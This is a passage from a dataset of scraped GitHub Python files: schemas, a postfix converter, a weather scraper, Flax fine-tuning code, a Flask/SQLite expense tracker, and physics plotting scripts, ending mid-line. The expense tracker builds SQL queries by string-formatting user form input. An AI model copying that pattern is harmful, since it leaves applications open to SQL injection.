dataloader\n","repo_name":"rv-harsha/face-forensics-GAN-inversion","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} {"seq_id":"30859336211","text":"from typing import List, Optional\n\nfrom django.urls import reverse\nfrom ninja import (\n Schema,\n Field\n)\n\n\nclass UserSchema(Schema):\n username: str\n profile_url: str\n\n @staticmethod\n def resolve_profile_url(obj):\n return reverse('profile_detail', args=(obj.username, ))\n\n\nclass ItemListSchema(Schema):\n identifier: str\n title: str = Field(..., alias=\"__str__\")\n city: str = None\n county_equivalent: str = None\n state: str = None\n year_vol: str\n sheet_ct: int\n stats: dict\n loaded_by: Optional[UserSchema]\n load_date: str\n volume_no: int = None\n urls: dict\n\n @staticmethod\n def resolve_load_date(obj):\n load_date_str = \"\"\n if obj.load_date:\n load_date_str = obj.load_date.strftime(\"%Y-%m-%d\")\n return load_date_str\n\n @staticmethod\n def resolve_year_vol(obj):\n year_vol = obj.year\n if obj.volume_no is not None:\n year_vol = f\"{obj.year} vol. {obj.volume_no}\"\n return str(year_vol)\n\n @staticmethod\n def resolve_stats(obj):\n items = obj.sort_lookups()\n unprep_ct = len(items['unprepared'])\n prep_ct = len(items['prepared'])\n georef_ct = len(items['georeferenced'])\n percent = 0\n if georef_ct > 0:\n percent = int((georef_ct / (unprep_ct + prep_ct + georef_ct)) * 100)\n\n main_lyrs_ct = 0\n if obj.sorted_layers:\n main_lyrs_ct = len(obj.sorted_layers['main'])\n mm_ct, mm_todo, mm_percent = 0, 0, 0\n mm_display = \"0/0\" # default so the return below never hits an undefined name\n if main_lyrs_ct != 0:\n # make sure 0/0 appears at the very bottom, then 0/1, 0/2, etc.\n mm_percent = main_lyrs_ct * .000001\n mm_display = f\"0/{main_lyrs_ct}\"\n if obj.multimask is not None:\n mm_ct = len(obj.multimask)\n mm_todo = main_lyrs_ct - mm_ct\n if mm_ct > 0:\n mm_display = f\"{mm_ct}/{main_lyrs_ct}\"\n mm_percent = mm_ct / main_lyrs_ct\n mm_percent += main_lyrs_ct * .000001\n\n return {\n \"unprepared_ct\": unprep_ct,\n \"prepared_ct\": prep_ct,\n \"georeferenced_ct\": georef_ct,\n \"percent\": percent,\n \"mm_ct\": mm_todo,\n \"mm_display\": mm_display,\n \"mm_percent\": mm_percent,\n }\n\n @staticmethod\n def resolve_mj_exists(obj):\n return obj.mosaic_geotiff is not None\n\n @staticmethod\n def resolve_urls(obj):\n return {\n \"summary\": reverse('volume_summary', args=(obj.identifier, )),\n \"viewer\": reverse('volume_summary', args=(obj.identifier, )),\n }\n\n","repo_name":"mradamcox/ohmg","sub_path":"content/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"27"} {"seq_id":"74899957831","text":"#solution of this task based on Stack data structure and operations with it\n\ndef toPostFixExpression(e):\n prec = {} # stores operator priorities, where 3 - the highest priority, 1 - the lowest\n prec[\"*\"] = 3 \n prec[\"/\"] = 3\n prec[\"+\"] = 2\n prec[\"-\"] = 2\n prec[\"(\"] = 1\n \n stack = [] # for keeping operators.\n output = [] # list for output.\n \n for el in e:\n if el.isdigit():\n output.append(el) # appending to the end of the output list.\n \n elif el == '(':\n stack.insert(0,el)\n \n elif el == ')':\n top_element = stack[0] # imitation of Stack method pop()\n del stack[0]\n \n while top_element != '(':\n output.append(top_element) \n top_element = stack[0] \n del stack[0]\n \n else:\n while len(stack) > 0 and prec[stack[0]] 
>= prec[el]: # while the stack is not empty and its first element has higher or equal priority\n output.append(stack[0])\n del stack[0]\n stack.insert(0,el)\n \n while len(stack) > 0: # if stack is not empty\n output.append(stack[0])\n del stack[0]\n \n return output\n","repo_name":"katesem/Python-online-marathon","sub_path":"sprint_1/s1_task5.py","file_name":"s1_task5.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} {"seq_id":"11974643215","text":"from src.com.hsjry.strategy.Strategy import *\n\n\nclass BootStrap:\n \"\"\"\n Bootstrap class.\n \"\"\"\n\n def __init__(self, strategyList: Strategy = []):\n \"\"\"\n Initialize the strategies.\n :param strategyList:\n \"\"\"\n self.__gitStrategyDict = {}\n for strategy in strategyList:\n self.__gitStrategyDict[strategy.getName()] = strategy\n\n def getStrategy(self, strategyName: str) -> Strategy:\n \"\"\"\n Get a strategy by name.\n :param strategyName:\n :return:\n \"\"\"\n strategy = self.__gitStrategyDict.setdefault(strategyName)\n if strategy is None:\n raise RuntimeError(strategyName + \" invalid argument, no such command!!!\")\n return strategy\n\n\ndef init() -> BootStrap:\n branchStrategy = BranchStrategy()\n tagStrategy = TagStrategy()\n mrStrategy = MRStrategy()\n buildStrategy = BuildStrategy()\n\n lis = [branchStrategy, tagStrategy, mrStrategy, buildStrategy]\n return BootStrap(lis)\n","repo_name":"17610070778/git-helper","sub_path":"src/com/hsjry/boot/BootStrap.py","file_name":"BootStrap.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} {"seq_id":"1745762300","text":"import urllib2\nimport cookielib\ndef weather():\n cookieJar = cookielib.CookieJar()\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookieJar))\n\n url = \"https://www.wunderground.com/global/stations/42182.html\"\n request = urllib2.Request(url)\n page = opener.open(request)\n\n # This is one big string\n rawdata = page.read()\n # This breaks it up into lines\n lines_of_data = rawdata.split('\\n')\n\n # This is one line in the raw data that looks interesting. I'm going to\n # filter the raw data based on the \"og:title\" text.\n # '<meta property=\"og:title\" content=\"...\" />'\n\n # The \"if line.find(\" bit is the filter. 
\n special_lines = [line for line in lines_of_data if line.find('og:title')>-1]\n\n # Now we clean up - this is very crude, but you can improve it with\n # exactly what you want to do.\n info = special_lines[0].replace('\"','').split('content=')[1]\n sections = info.split('|')\n if(sections[2]==' Rain />' or sections[2]==' Mostly Cloudy />'):\n print(sections)\n return False\n else:\n print(sections)\n return True\nif(__name__=='__main__'):\n print(weather())\n","repo_name":"raghav16259/Garden-Bot","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73406996231","text":"from flax.core import frozen_dict\nfrom flax.training import checkpoints\n\n\ndef finetune_from_lstm(state, restore_checkpoint_dir, config):\n \"\"\"Updates the current state for fine-tuning from a pre-trained LSTM.\n\n It updates state using some of the values from the restore_checkpoint_dir.\n\n The Transformer node_span_encoder, as well as the IPA-GNN lstm weights.\n\n Branch decisions and raise decisions weights are not going to be loaded.\n \"\"\"\n old_state = checkpoints.restore_checkpoint(config.restore_checkpoint_dir, None)\n old_params = old_state['params']\n\n state = state.replace(step=int(old_state['step']))\n state = state.replace(rng=old_state['rng'])\n\n params = state.params\n params_copy = params.unfreeze()\n params_copy['node_span_encoder'] = old_params['input_embedder']\n\n for n in range(config.rnn_layers):\n params_copy['ipagnn']['ipagnn_layer_scan'][f'lstm_{n}'] = old_params['encoder'][f'lstm_{n}']['OptimizedLSTMCell_0']\n\n state = state.replace(params=frozen_dict.FrozenDict(params_copy))\n return state\n\n\ndef finetune_from_ipagnn(state, restore_checkpoint_dir, config):\n \"\"\"Updates the current state for fine-tuning from a pre-trained IPAGNN.\n\n It updates state using some of the values from the restore_checkpoint_dir.\n\n The Transformer node_span_encoder, as well as the IPA-GNN lstm weights and\n branch decision weights are loaded.\n\n Args:\n state: The current method's state.\n restore_checkpoint_dir: The directory to load the IPAGNN checkpoint from.\n config: The experiment config.\n Returns:\n A new version of state, with parameters taken from the pre-trained IPAGNN.\n \"\"\"\n old_state = checkpoints.restore_checkpoint(config.restore_checkpoint_dir, None)\n state = state.replace(step=int(old_state['step']))\n # state = state.replace(opt_state=old_state['opt_state'])\n state = state.replace(rng=old_state['rng'])\n params = state.params\n old_params = old_state['params']\n key_paths = [\n # Note we omit loading the output layer weights.\n ('node_span_encoder',),\n ('ipagnn', 'ipagnn_layer_scan', 'branch_decide_dense',),\n ] + [\n ('ipagnn', 'ipagnn_layer_scan', f'lstm_{n}',)\n for n in range(config.rnn_layers)\n ]\n params_copy = params.unfreeze()\n for key_path in key_paths:\n params_component = params_copy\n old_params_component = old_params\n for key_path_component in key_path[:-1]:\n params_component = params_component[key_path_component]\n old_params_component = old_params_component[key_path_component]\n\n params_component[key_path[-1]] = old_params_component[key_path[-1]]\n state = state.replace(params=frozen_dict.FrozenDict(params_copy))\n return 
state\n","repo_name":"google-research/runtime-error-prediction","sub_path":"core/lib/finetune.py","file_name":"finetune.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"27"} +{"seq_id":"37701343327","text":"\nfrom django.conf.urls import include, url\nfrom views import *\n\nurlpatterns = [\n url(r'^$',index,name='index'),\n url(r'^category$',category,name='category'),\n url(r'^archive$',archive,name='archive'),\n url(r'^tag$',tag,name='tag'),\n url(r'^article$',article,name='article'),\n url(r'^comment_post/$', comment_post, name='comment_post'),\n url(r'^login$', login_x , name='login'),\n url(r'^logout$', logout_x , name='logout'),\n]\n\n","repo_name":"BraveChen95/boke","sub_path":"boke/gao/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40830146704","text":"#here have set up bare bones 'User' class for testing\r\n\r\n\r\nimport random\r\nimport bpy\r\n\r\nclass User:\r\n\r\n requirePassword = True\r\n maxUsers = 1000 #not used\r\n usersList = []\r\n\r\n def __init__(self, name, id_num, DOB):\r\n self.name = name\r\n self.id_num = id_num\r\n self.DOB = DOB\r\n## self.pointer = User.usersList(find(self, User.usersList) - 1) #how to point to previous user?\r\n self.usersList.append(self)\r\n\r\n def showUserByPosition(position):\r\n print(User.usersList[position].name)\r\n print(User.usersList[position].id_num)\r\n print(User.usersList[position].DOB,\"\\n\")\r\n\r\n\r\n def showUsers():\r\n #shows each all user objects\r\n #could just use specific 'showUser' function for each\r\n print(\"\\nThere are currently\", len(User.usersList), \"users in the system....\")\r\n for user in User.usersList:\r\n## print(\"\\n\")\r\n print(user.name)\r\n print(user.id_num)\r\n print(user.DOB,\"\\n\")\r\n\r\n\r\n def checkId_num(newNumber):\r\n for k in range(0,len(User.usersList)):\r\n## print(\"iteration # \", k, \" = \", User.usersList[k].id_num)\r\n if(User.usersList[k].id_num == newNumber ):\r\n return False\r\n return True\r\n\r\n\r\ndef getUniqueNumber():\r\n#check that there is not already this id_num in database \r\n unique = False \r\n while(not unique): \r\n num = random.randrange(1,User.maxUsers)\r\n #print(\"Inside getUniqueNumber(), the number generated is: \",num) \r\n if(User.checkId_num(num) == True):\r\n unique = True \r\n return num\r\n\r\n\r\nprint(\"\\n\")\r\nuser1 = User(\"Bob Micheals\", getUniqueNumber(), \"12/10/87\")\r\nuser2 = User(\"Tom Smith\", getUniqueNumber(), \"01/28/98\")\r\nuser3 = User(\"Sarah Smith\", getUniqueNumber(), \"11/15/00\")\r\nuser4 = User(\"Sean Smith\", getUniqueNumber(), \"07/14/89\")\r\nuser5 = User(\"tara toga\", getUniqueNumber(), \"03/22/93\")\r\n\r\n\r\nprint(\"\\ntesting 'showUserByPosition' function.....\")\r\nindex = 1 #this is the position in the Users list (first)\r\nUser.showUserByPosition(index)\r\n\r\n\r\nprint(\"\\ntesting 'showUsers' function.....\")\r\nUser.showUsers()\r\n\r\n\r\n##################################################################\r\n\r\n\r\n##https://stackoverflow.com/questions/26628525/importerror-no-module-named-bpy\r\n# NO MODULE NAMED BPI ERROR!!!!!!!!\r\nimport bpy\r\n\r\n# deselect all\r\nbpy.ops.object.select_all(action='DESELECT')\r\n\r\n# selection\r\nbpy.data.objects['user4'].select = True\r\n\r\n# remove it\r\nbpy.ops.object.delete()\r\n\r\n\r\n\r\nprint(\"\\ntesting 'showUsers' after 
removing.....\")\r\nUser.showUsers()\r\n","repo_name":"Trent-K/User_Management_System","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4205490231","text":"from flask import render_template, redirect, request\nfrom app import app\n\nimport sqlite3 as db\n\n\ndef init():\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n sql = '''\n create table if not exists expenses(\n date date,\n category string,\n amount real,\n additional_comments string\n )\n '''\n cur.execute(sql)\n conn.commit()\n\n\ndef insert(date, category, price, comm):\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n\n sql= '''\n INSERT INTO expenses VALUES('{}','{}',{},'{}')\n '''.format(date, category, price, comm)\n\n cur.execute(sql)\n conn.commit()\n\ndef view_all():\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n sql1 = '''\n select * from expenses\n '''\n cur.execute(sql1)\n results = cur.fetchall()\n #results = pd.read_sql_query(sql1,conn)\n #print(results)\n sql2 = '''\n select sum(amount) from expenses\n '''\n cur.execute(sql2)\n total = cur.fetchone()\n print(\"\\n Total expense = {}\".format(total[0]))\n return results, total[0]\n\ndef init_values():\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n sql = '''\n select * from expenses\n '''\n cur.execute(sql)\n results = cur.fetchall()\n \n if len(results)==0:\n insert(\"2021-06-19\", \"rent\" , 20000, \"\")\n insert(\"2021-06-19\" , \"transport\", 2345,\"\")\n insert(\"2021-06-19\", \"groceries\" , 3450,\"\")\n insert(\"2021-06-19\" , \"home and utilities\" , 1247 , \"\")\n insert(\"2021-06-19\", \"insurance\" , 125000, \"\")\n insert(\"2021-06-19\" , \"bills and emi\" , 11230 , \"\")\n insert(\"2021-06-19\" , \"education\" , 150000,\"\")\n insert(\"2021-06-19\" , \"health and personal care\" , 6700 , \"\")\n insert(\"2021-05-23\", \"rent\" , 15000, \"\")\n insert(\"2021-05-19\" , \"transport\", 1345,\"\")\n insert(\"2021-05-25\", \"groceries\" , 2324,\"\")\n insert(\"2021-05-14\" , \"home and utilities\" , 908 , \"\")\n insert(\"2021-05-11\", \"insurance\" , 150000, \"\")\n insert(\"2021-05-18\" , \"bills and emi\" , 4560 , \"\")\n insert(\"2021-05-12\" , \"education\" , 29000,\"\")\n insert(\"2021-05-20\" , \"health and personal care\" , 3700 , \"\")\n insert(\"2020-02-14\", \"rent\" , 20000, \"\")\n insert(\"2020-08-25\" , \"transport\", 2345,\"\")\n insert(\"2020-05-07\", \"groceries\" , 3450,\"\")\n insert(\"2020-04-02\" , \"home and utilities\" , 1247 , \"\")\n insert(\"2020-08-26\", \"insurance\" , 125000, \"\")\n insert(\"2020-07-22\" , \"bills and emi\" , 11230 , \"\")\n insert(\"2020-09-13\" , \"education\" , 150000,\"\")\n insert(\"2020-01-25 \" , \"health and personal care\" , 6700 , \"\")\n insert(\"2020-05-14\" , \"health and personal care\" , 3400 , \"\")\n conn.commit()\n\ndef delete(date, price):\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n sql= '''\n DELETE from expenses where date = '{}'\n '''.format(date)\n\n cur.execute(sql)\n conn.commit()\n\ndef view_by_category(category):\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n sql1 = '''\n select * from expenses where category = '{}'\n '''.format(category)\n cur.execute(sql1)\n results = cur.fetchall()\n #results = pd.read_sql_query(sql1,conn)\n #print(results)\n sql2 = '''\n select sum(amount) from expenses\n '''\n cur.execute(sql2)\n total = cur.fetchone()\n print(\"\\n 
Total expense = {}\".format(total[0]))\n sql3 = '''\n select sum(amount) from expenses where category = '{}'\n '''.format(category)\n cur.execute(sql3)\n total_category = cur.fetchone()\n print(\"\\n Total expense in the category = {}\".format(total_category[0]))\n return results, total[0], total_category[0]\n\ndef view_by_date(date1,date2):\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n sql1 = '''\n select * from expenses where date between '{}' and '{}'\n '''.format(date1, date2)\n cur.execute(sql1)\n results = cur.fetchall()\n #results = pd.read_sql_query(sql1,conn)\n #print(results)\n sql2 = '''\n select sum(amount) from expenses\n '''\n cur.execute(sql2)\n total = cur.fetchone()\n print(\"\\n Total expense = {}\".format(total[0]))\n sql3 = '''\n select sum(amount) from expenses where date between '{}' and '{}'\n '''.format(date1, date2)\n cur.execute(sql3)\n total_category = cur.fetchone()\n print(\"\\n Total expense in between these dates = {}\".format(total_category[0]))\n return results , total[0], total_category[0]\n\n\ndef row_count():\n conn = db.connect(\"expenses.db\")\n cur = conn.cursor()\n sql = '''\n select * from expenses\n '''\n cur.execute(sql)\n results = cur.fetchall()\n return len(results)\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template(\"home.html\")\n\n@app.route('/new',methods = ['GET' , 'POST'])\ndef new():\n return render_template(\"form.html\")\n\n@app.route ('/submit' , methods = ['GET' , 'POST']) \ndef submit():\n date = request.form['date']\n category = request.form['category']\n amount = request.form['amount']\n comment = request.form['comment']\n old_row = row_count()\n insert(date,category,amount,comment)\n new_row = row_count()\n if new_row - old_row ==1:\n message = \"Entry successful\"\n else:\n message = \"Entry unsuccessful. 
Please Try again!\"\n\n return render_template(\"action_page.html\" ,\n date = date , \n category = category,\n amount = amount,\n message = message)\n\n@app.route(\"/view\", methods = ['GET' , 'POST'])\ndef view():\n return render_template(\"view_database.html\")\n\n\n@app.route(\"/view_c_or_d\", methods = ['GET' , 'POST'])\ndef view_c_or_d():\n view_by = request.form['view']\n if view_by == 'view all': return redirect(\"/view_all_results\")\n elif view_by==\"view by category\": return redirect(\"/view_category_choice\")\n else: return redirect(\"/view_date_choice\")\n\n\n@app.route(\"/view_all_results\" , methods = ['GET' , 'POST'])\ndef view_all_results():\n results , total = view_all()\n message = \"python3 graphs.py --view_by all\"\n return render_template(\"view_result_data.html\" , results = results , total = total,\\\n message = message)\n\n@app.route(\"/view_category_choice\" , methods = ['GET' , 'POST'])\ndef view_category_choice():\n return render_template(\"view_database.html\" ,opt=2)\n\n@app.route(\"/view_date_choice\" , methods = ['GET' , 'POST'])\ndef view_date_choice():\n return render_template(\"view_database.html\" ,opt=3)\n\n\n@app.route(\"/view_category_results\" , methods = ['GET' , 'POST'])\ndef view_category_results(): \n category = request.form['view_category']\n message = \"python3 graphs.py --view_by category --category '\" + category + \"'\"\n results , total , total_c = view_by_category(category)\n return render_template(\"view_result_data.html\" , results = results , total = total, \n total_c = total_c, message = message)\n\n@app.route(\"/view_date_results\" , methods = ['GET' , 'POST'])\ndef view_date_results():\n date1 = request.form['from']\n date2 = request.form['to']\n message = \"python3 graphs.py --view_by date --from_date \" + date1 + \" --to_date \" +date2\n results , total , total_c = view_by_date(date1, date2)\n return render_template(\"view_result_data.html\" , results = results , total = total, \n total_c = total_c , message = message)\n","repo_name":"tanmaygoyal258/Expense-Tracker--Lambda","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34884361772","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n\ndef plotlistdiff(total,gauss,gauss_exv,gauss_ixv,fname):\n start, end = total[0][0],total[-1][1] \n from gwpy.segments import DataQualityFlag\n gauss = DataQualityFlag(name='Gaussian ({0})'.format(len(gauss)),\n active=gauss,\n known=[(start,end)])\n gauss_exv = DataQualityFlag(name='Gauss_seis1 ({0})'.format(len(gauss_exv)),\n active=gauss_exv,\n known=[(start,end)])\n gauss_ixv = DataQualityFlag(name='Gauss_seis2 ({0})'.format(len(gauss_ixv)),\n active=gauss_ixv,known=[(start,end)])\n total = DataQualityFlag(name='Total ({0})'.format(len(total)),\n active=total,known=[(start,end)])\n args = gauss,gauss_ixv,gauss_exv,total\n start = args[0].known[0].start\n end = args[0].known[0].end\n plot = args[0].plot(figsize=(14,5),epoch=start,xlim=(start,end))\n ax = plot.gca()\n for data in args[1:]:\n ax.plot(data,label=data.name)\n ax.set_xlim(start,end)\n print(fname)\n plt.title(fname)\n plt.savefig(fname)\n \n \ndef plotpi(gauss,nonegauss,lack,fname):\n data = [len(gauss),len(nonegauss),len(lack)]\n label = ['Gaussian','Non-Gaussian','Lack of Data']\n fig,ax=plt.subplots(1,1,figsize=(7,3))\n wedges,texts,autotexts = ax.pie(\n 
data,startangle=90,counterclock=False,\n wedgeprops={'linewidth':1, 'edgecolor':\"black\"},\n autopct=\"%1.1f%%\",textprops=dict(color=\"w\"),colors=['g','y','red'])\n ax.legend(wedges, label,title=\"Conditions of the \\nData Segments\",\n loc=\"center left\",bbox_to_anchor=(1, 0, 0.5, 1))\n plt.setp(autotexts, size=12, weight=\"bold\")\n plt.title(fname)\n print(fname)\n plt.savefig(fname)\n plt.close()\n\n \n \ndef plotlist(total,gauss,nonegauss,lack,fname):\n start, end = total[0][0],total[-1][1]\n from gwpy.segments import DataQualityFlag\n gauss = DataQualityFlag(name='Gaussian ({0})'.format(len(gauss)),\n active=gauss,\n known=[(start,end)])\n lack = DataQualityFlag(name='Lack of Data ({0})'.format(len(lack)),\n active=lack,\n known=[(start,end)])\n nonegauss = DataQualityFlag(name='Non-Gaussian ({0})'.format(len(nonegauss)),\n active=nonegauss,known=[(start,end)])\n total = DataQualityFlag(name='Total ({0})'.format(len(total)),\n active=total,known=[(start,end)])\n args = gauss,nonegauss,lack,total\n start = args[0].known[0].start\n end = args[0].known[0].end\n plot = args[0].plot(figsize=(14,5),epoch=start,xlim=(start,end))\n ax = plot.gca()\n for data in args[1:]:\n ax.plot(data,label=data.name)\n ax.set_xlim(start,end)\n print(fname)\n plt.title(fname)\n plt.savefig(fname)\n\n \n\nfrom dataquality.dataquality import DataQuality\nstart,end = 1211817600, 1245372032\n\n\n# EXV-IXV differential\nfmt_2seis_total = 'select {2}.startgps,{2}.endgps '+\\\n 'from {2} INNER JOIN {3} '+\\\n 'ON ({2}.startgps ={3}.startgps) '+\\\n 'WHERE ({2}.startgps>={0} and {2}.endgps<={1})'\nfmt_2seis_lack = 'select {2}.startgps,{2}.endgps '+\\\n 'from {2} INNER JOIN {3} '+\\\n 'ON ({2}.startgps ={3}.startgps) '+\\\n 'WHERE (({2}.flag=2 and {3}.flag=2) or ({2}.flag=4 and {3}.flag=4 ))'+\\\n ' and ({2}.startgps>={0} and {2}.endgps<={1})' \nfmt_2seis = 'select {2}.startgps,{2}.endgps '+\\\n 'from {2} INNER JOIN {3} '+\\\n 'ON ({2}.startgps ={3}.startgps) '+\\\n 'WHERE ({2}.flag={4} and {3}.flag={4} )'+\\\n ' and ({2}.startgps>={0} and {2}.endgps<={1})'\n\n#\nfmt_total = 'select startgps,endgps from {2} WHERE ' +\\\n '(startgps>={0} and endgps<={1})'\nfmt_lack = 'select startgps,endgps from {2} WHERE (flag=2 or flag=4) and' +\\\n '(startgps>={0} and endgps<={1})'\nfmt_gauss = 'select startgps,endgps from {2} WHERE flag=0 and ' +\\\n '(startgps>={0} and endgps<={1})'\nfmt_nonegauss = 'select startgps,endgps from {2} WHERE flag=8 and ' +\\\n '(startgps>={0} and endgps<={1})'\n\n \nseislist = ['EXV_SEIS','IXV_SEIS'],['IXV_SEIS','IXVTEST_SEIS']\nfor seis1,seis2 in seislist:\n with DataQuality('./dataquality/dqflag.db') as db:\n #\n total = db.ask(fmt_2seis_total.format(start,end,seis1,seis2))\n gauss = db.ask(fmt_2seis.format(start,end,seis1,seis2,0))\n gauss_exv = db.ask(fmt_gauss.format(start,end,seis1))\n gauss_ixv = db.ask(fmt_gauss.format(start,end,seis2)) \n #\n fname = './results/segmentlist_{0}-{1}.png'.format(seis1,seis2) \n plotlistdiff(total,gauss,gauss_exv,gauss_ixv,fname) \n \n\n#\nseislist = ['EXV_SEIS','IXV_SEIS','IXVTEST_SEIS','MCE_SEIS','MCF_SEIS','BS_SEIS']\nfor seis in seislist:\n with DataQuality('./dataquality/dqflag.db') as db:\n #\n total = db.ask(fmt_total.format(start,end,seis))\n gauss = db.ask(fmt_gauss.format(start,end,seis))\n nonegauss = db.ask(fmt_nonegauss.format(start,end,seis))\n lack = db.ask(fmt_lack.format(start,end,seis))\n #\n fname = './results/segmentpi_{0}.png'.format(seis) \n plotpi(gauss,nonegauss,lack,fname)\n fname = './results/segmentlist_{0}.png'.format(seis) \n 
plotlist(total,gauss,nonegauss,lack,fname) \n","repo_name":"MiyoKouseki/kagra-gif","sub_path":"ugm/seismicnoise/main2_plotSegments.py","file_name":"main2_plotSegments.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} {"seq_id":"19135423317","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom deformationcytometer.evaluation.helper_functions import getConfig, getData, load_all_data, plotBinnedData\nfrom pathlib import Path\nimport pandas as pd\n#data1 = np.loadtxt(r\"\\\\131.188.117.96\\biophysDS\\emirzahossein\\microfluidic cell rhemeter data\\microscope_1\\september_2020\\2020_09_15_alginate2%_NIH_tanktreading_1\\2\\2020_09_15_10_35_15\\speeds.txt\")\n\nfrom deformationcytometer.includes.includes import getInputFile\nfrom deformationcytometer.evaluation.helper_functions import getConfig, getData, getVelocity, correctCenter\nfrom deformationcytometer.evaluation.helper_functions import fit_func_velocity\n\ndef removeNan(x, y):\n indices = ~np.isnan(x) & ~np.isnan(y)\n return x[indices], y[indices]\n\ndef getXY(pressure):\n data, config = load_all_data(\n rf\"\\\\131.188.117.96\\biophysDS\\emirzahossein\\microfluidic cell rhemeter data\\microscope_1\\september_2020\\2020_09_16_alginate2%_NIH_tanktreading\\1\\*_result.txt\",\n pressure=pressure)\n x = np.abs(data.rp) * 1e-6\n y = data.velocity * 1e-3\n return removeNan(x, y)\n\ndata, config = load_all_data(rf\"\\\\131.188.117.96\\biophysDS\\emirzahossein\\microfluidic cell rhemeter data\\microscope_1\\september_2020\\2020_09_16_alginate2%_NIH_tanktreading\\1\\*_result.txt\", pressure=3)\n\ndata = data[np.abs(data.velocity-data.velocity_fitted) < 1.5]\n\nplt.subplot(121)\nplt.plot(data.rp, data.velocity, \"o\")\nvel = fit_func_velocity(config)\ndx = 1e-6\nx = np.arange(-config[\"channel_width_m\"]/2, config[\"channel_width_m\"]/2, dx)\nv = vel(x*1e6)*1e-3\nplt.plot(x*1e6, v*1e3, \"k--\")\nplt.axhline(0, color=\"k\", lw=0.8)\nplt.xlabel(\"channel position (µm)\")\nplt.ylabel(\"velocity (mm/s)\")\n\nplt.subplot(122)\ngrad = np.diff(v)/np.diff(x)# * 1e3\n#plt.plot(data.rp, data.velocity_gradient, \"o\")\nplt.plot((x[:-1]+0.5*np.diff(x))*1e6, grad, \"k--\")\nplt.xlabel(\"channel position (µm)\")\nplt.ylabel(\"shear rate $\\dot \\gamma$ (1/s)\")\n#plt.plot(data.rp*1e-6, getVelGrad(data.rp), \"s\")\n#plt.plot(x[:-1]+0.5*np.diff(x), grad, \"-+\")\n\nplt.show()\n\nplt.clf()\nplt.subplot(121)\nx = np.abs(data.rp)*1e-6\ny = data.velocity*1e-3\n#plt.plot(x, y, \"o\")\n\nif 1: # Euler\n H = 200e-6\n W = 200e-6\n n = np.arange(1, 99, 2)[:, None]\n tau = 1 / 20\n alpha = 0.67\n eta0 = 3.65\n P = 3 * 100000\n L = 58.5e-3\n pi = np.pi\n\n x1, y1 = getXY(1)\n x2, y2 = getXY(2)\n x3, y3 = getXY(3)\n\n def getVelocity(y, eta0, alpha, tau, P, W, H, L):\n def euler(t, x0, y0, f):\n x = np.zeros_like(t)\n y = np.zeros_like(t)\n x[0] = x0\n y[0] = y0\n dt = np.diff(t)\n for i, ti in enumerate(t[:-1]):\n y[i + 1] = f(ti, x[i])\n x[i + 1] = x[i] + y[i + 1] * dt[i]\n return t, x, y\n\n def getVDot(y, v):\n return 1 / tau * (np.abs(v * eta0 / getBeta(y) - 1)) ** (1 / alpha)\n\n def getBeta(y):\n return -(4 * (H ** 2) * P) / (L * (pi ** 3)) * np.sum(\n (-1) ** ((n - 1) / 2) / (n ** 3) * (1 - np.cosh((n * pi * y) / H) / np.cosh((n * pi * W) / (2 * H))),\n axis=0)\n\n t, v, vdot = euler(y, getBeta(0)/eta0, 0, getVDot)\n return t, -v, vdot\n\n import scipy.interpolate\n import scipy.optimize # needed for the curve_fit/minimize calls further below\n\n if 0:\n def getCostP(i, eta0, alpha, tau, W, H):\n yy = np.arange(0, H / 2, 1e-6) # [:100]\n t, 
